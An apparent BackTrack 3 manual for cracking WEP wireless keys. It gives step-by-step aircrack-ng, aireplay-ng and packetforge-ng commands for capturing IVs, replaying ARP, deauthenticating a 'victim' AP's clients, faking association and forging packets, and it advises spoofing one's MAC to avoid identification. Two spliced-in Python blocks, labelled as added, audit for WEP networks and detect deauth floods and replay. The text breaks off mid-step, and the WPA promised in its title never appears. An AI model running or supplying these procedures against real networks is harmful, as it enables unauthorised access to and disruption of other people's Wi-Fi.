How To BT3
BT3 Crack WEP WPA Manual
0. Make bootable USB
Format the USB drive as FAT32 under Windows.
Mount bt3-usb.iso.
Copy the boot and BT3 folders onto the USB drive.
Run boot/bootinst.bat
OK.
Log in to the BT3 system (KDE)
User: root
Pwd: toor
If KDE does not start after login, try this:
#startx
Still no desktop? Configure X first, then try again:
#xconfig
#startx
Note
If a command does not return immediately, open a new shell and run the next command there.
WNC: Wireless Net Card, your own wireless network card.
AP: Access Point, the victim.
1. CRACK OPEN WEP WITH VALID CLIENT ARP
Precondition
The AP uses WEP encryption.
The AP uses Open authentication.
The AP has a valid client.
The AP client only needs to generate valid ARP packets.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load a driver that supports monitor mode for the Intel 3945 (ipwraw). Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for APs. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC
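As an added example (not part of this manual), here is the check a defender runs on the same airodump-ng scan: a Python script that parses the CSV export and flags every AP still using WEP or Open (OPN) encryption, which is the precondition every procedure below relies on. The sample CSV is constructed; its column layout is assumed to follow airodump-ng's CSV export (only the AP table, the station table is omitted).

```python
import csv
import io

# Constructed sample in the layout of an airodump-ng CSV export (assumption:
# column order as in the tool's AP table; the station table is omitted).
SAMPLE_AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:00:00:00:00:00, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 11, 54, WEP, WEP, , -40, 120, 350, 0. 0. 0. 0, 5, tenda,
AA:AA:AA:AA:AA:AA, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 6, 54, OPN, , , -55, 80, 0, 0. 0. 0. 0, 5, guest,
BB:BB:BB:BB:BB:BB, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 1, 54, WPA2, CCMP, PSK, -60, 90, 0, 0. 0. 0. 0, 7, corpnet,
"""

# Why each setting is a finding; these weaknesses are what sections 1-5 rely on.
WEAK_PRIVACY = {
    "WEP": "WEP: 24-bit IVs repeat and the RC4 key is recoverable from captured IVs",
    "OPN": "OPN: no encryption, frames are readable and injectable by anyone in range",
}


def parse_ap_table(text):
    """Parse the AP table of an airodump-ng CSV export into dicts keyed by header name."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for fields in reader:
        if not fields or not fields[0].strip():
            continue  # blank separator line (or start of the station table)
        rows.append(dict(zip(header, (f.strip() for f in fields))))
    return rows


def assess(rows):
    """Return one finding per AP whose Privacy column is WEP or OPN."""
    findings = []
    for r in rows:
        privacy = r.get("Privacy", "")
        key = "WEP" if "WEP" in privacy else ("OPN" if privacy == "OPN" else None)
        if key is None:
            continue
        findings.append({
            "bssid": r["BSSID"],
            "essid": r["ESSID"],
            "channel": int(r["channel"]),
            "privacy": privacy,
            "ivs": int(r["# IV"] or 0),  # IVs already observed: WEP exposure so far
            "reason": WEAK_PRIVACY[key],
        })
    return findings


if __name__ == "__main__":
    for finding in assess(parse_ap_table(SAMPLE_AIRODUMP_CSV)):
        print(f'{finding["bssid"]} ch{finding["channel"]:>2} {finding["essid"]!r}: {finding["reason"]}')
```

Run it against a real export (airodump-ng -w prefix writes prefix-01.csv) to inventory your own APs; any WEP or OPN row is a network that the rest of this manual applies to, and the fix is WPA2 (CCMP) or WPA3, not a longer WEP key.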
Step4. Optional. For safety, change your WNC's MAC, e.g. to 11:11:11:11:11:11
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 and set it to the channel of the AP.
#airmon-ng start wifi0 11
Optional. Show the working mode and channel of wifi0
#iwconfig wifi0
Optional. Test the injection capability of your WNC.
#aireplay-ng -9 wifi0
Step6. Crack the password of the AP now.
#wesside-ng -i wifi0 -v 00:00:00:00:00:00
2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA
Precondition
The AP uses WEP encryption.
The AP uses Open authentication.
The AP has a valid client.
The AP client generates plenty of valid data.
We can collect lots of IVs from the AP client's traffic.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load a driver that supports monitor mode for the Intel 3945 (ipwraw). Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for APs. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC
Step4. For safety, change your WNC's MAC, e.g. to 11:11:11:11:11:11
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 and set it to the channel of the AP.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0
#iwconfig wifi0
Test the injection capability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture IVs to a data file. -w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Crack the password of the AP now (-n 64: assume a 64-bit WEP key; -b: the AP MAC).
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA
Precondition
The AP uses WEP encryption.
The AP uses Open authentication.
The AP has a valid client.
The AP client generates only a little valid traffic (few IVs).
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load a driver that supports monitor mode for the Intel 3945 (ipwraw). Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for APs. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC
Step4. For safety, change your WNC's MAC, e.g. to 11:11:11:11:11:11
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 and set it to the channel of the AP.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0
#iwconfig wifi0
Test the injection capability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture IVs to a data file. -w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Use ARP replay to generate lots of IVs. This step may take a long time waiting for an ARP packet. You could connect another PC or laptop to the AP to supply an ARP packet.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Crack the password of the AP now (-n 64: assume a 64-bit WEP key).
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION
Precondition
The AP uses WEP encryption.
The AP uses Open authentication.
The AP has a valid client.
The AP client does not communicate with the AP.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load a driver that supports monitor mode for the Intel 3945 (ipwraw). Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for APs. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC
Step4. For safety, change your WNC's MAC, e.g. to 11:11:11:11:11:11
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 and set it to the channel of the AP.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0
#iwconfig wifi0
Test the injection capability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture IVs to a data file. -w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. -0 is the deauthentication mode: it disconnects the AP and its client and lets them reconnect.
#aireplay-ng -0 10 -a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0
Step8. Use the reconnection traffic of Step7 to complete the ARP injection.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
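Sections 3 and 4 depend on ARP replay (aireplay-ng -3) and deauthentication (aireplay-ng -0). As an added example, not part of this manual, here is the detection side: two checks a wireless IDS would run over decoded 802.11 frame records, one for a burst of deauthentication frames from a single source address, and one for a WEP data frame re-injected with an identical IV and length, which is what a replayed ARP looks like on the air. The frame records are constructed inline; the field names (ts, kind, src, dst, size, iv) are this example's own convention, not a capture tool's output format.

```python
from collections import Counter, defaultdict, deque

# Constructed addresses, reusing the placeholders of this manual.
AP = "00:00:00:00:00:00"
CLIENT = "CC:CC:CC:CC:CC:CC"


def detect_deauth_flood(frames, window=1.0, threshold=20):
    """Alert when one source address sends >= threshold deauthentication
    frames within `window` seconds. A real AP deauthenticates a station only
    occasionally; injection tools send deauths in tight bursts (threshold is
    an assumed tuning value)."""
    alerts = []
    recent = defaultdict(deque)  # src -> timestamps of its recent deauth frames
    alerted = set()
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["kind"] != "deauth":
            continue
        q = recent[f["src"]]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and f["src"] not in alerted:
            alerted.add(f["src"])
            alerts.append({"src": f["src"], "count": len(q), "ts": f["ts"]})
    return alerts


def detect_wep_replay(frames, min_repeats=5):
    """Every WEP data frame carries a 24-bit IV in the clear. A live client
    picks a fresh IV per frame, so the same (src, IV, length) triple seen
    many times in a short capture means one frame is being re-injected."""
    seen = Counter()
    for f in frames:
        if f["kind"] == "data" and f.get("iv") is not None:
            seen[(f["src"], f["iv"], f["size"])] += 1
    return [
        {"src": src, "iv": iv, "size": size, "count": n}
        for (src, iv, size), n in seen.items()
        if n >= min_repeats
    ]


def constructed_capture():
    """Constructed sample: ordinary client traffic, then a deauth burst
    spoofed with the AP's address, then one ARP frame replayed 50 times."""
    frames = []
    for i in range(40):  # 10 s of ordinary WEP traffic, distinct IVs
        frames.append({"ts": i * 0.25, "kind": "data", "src": CLIENT,
                       "dst": AP, "size": 100 + (i % 7), "iv": 0x100000 + i})
    for i in range(64):  # 64 deauths in 0.32 s, source address = AP
        frames.append({"ts": 10.0 + i * 0.005, "kind": "deauth", "src": AP,
                       "dst": CLIENT, "size": 26, "iv": None})
    for i in range(50):  # the same 68-byte frame with the same IV, 50 times
        frames.append({"ts": 12.0 + i * 0.02, "kind": "data", "src": CLIENT,
                       "dst": AP, "size": 68, "iv": 0x2ABCDE})
    return frames


def analyse(frames):
    return {"deauth": detect_deauth_flood(frames),
            "replay": detect_wep_replay(frames)}


if __name__ == "__main__":
    for name, hits in analyse(constructed_capture()).items():
        for h in hits:
            print(name, h)
```

The deauth check fires on the 20th frame of the burst; the replay check flags only the re-injected frame, not the 40 ordinary frames with distinct IVs. On the mitigation side, Protected Management Frames (802.11w) authenticate deauthentication frames so spoofed ones are discarded, and moving the network off WEP removes the replay/IV weakness entirely.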
5. CRACK OPEN WEP WITHOUT CLIENT
Precondition
The AP uses WEP encryption.
The AP uses Open authentication.
The AP has no client connected.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load a driver that supports monitor mode for the Intel 3945 (ipwraw). Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for APs. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC
Step4. For safety, change your WNC's MAC, e.g. to 11:11:11:11:11:11
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 and set it to the channel of the AP.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0
#iwconfig wifi0
Test the injection capability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture IVs to a data file. -w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Since there is no AP client, we need to create a virtual connection to the AP: make a fake association from your WNC to the AP now.
#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Failure Reason
The AP has a MAC filter.
Feeble signal from the AP.
The AP uses WPA encryption.
Mismatch between the WNC and the AP, e.g. different working channel.
Try
Drop the -e tenda parameter.
Set a lower rate. E.g. #iwconfig wifi0 rate 2M
To confirm the virtual connection:
#tcpdump -n -e -s0 -vvv -i wifi0
There are three methods for the remaining cracking work.
Case1
Step8. Use the -2 attack mode (interactive packet replay); it can capture, extract and inject packets.
#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Press Enter at the question "Use this packet ?" to launch the attack.
After capturing enough IVs, use aircrack-ng to crack the key.
Step9. Use aircrack-ng, as in:
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
Case2
Step8. Get a xor file containing the recovered keystream, which is what is needed to forge valid packets. The generated xor file name starts with "fragment".
#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
Step9. Using the xor file, create a fake ARP packet. -y xor_file -w fake_arp_file
#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp
Step10. Use the -2 attack mode with -r fake_arp_file and -x data_sent_rate (less than 1024).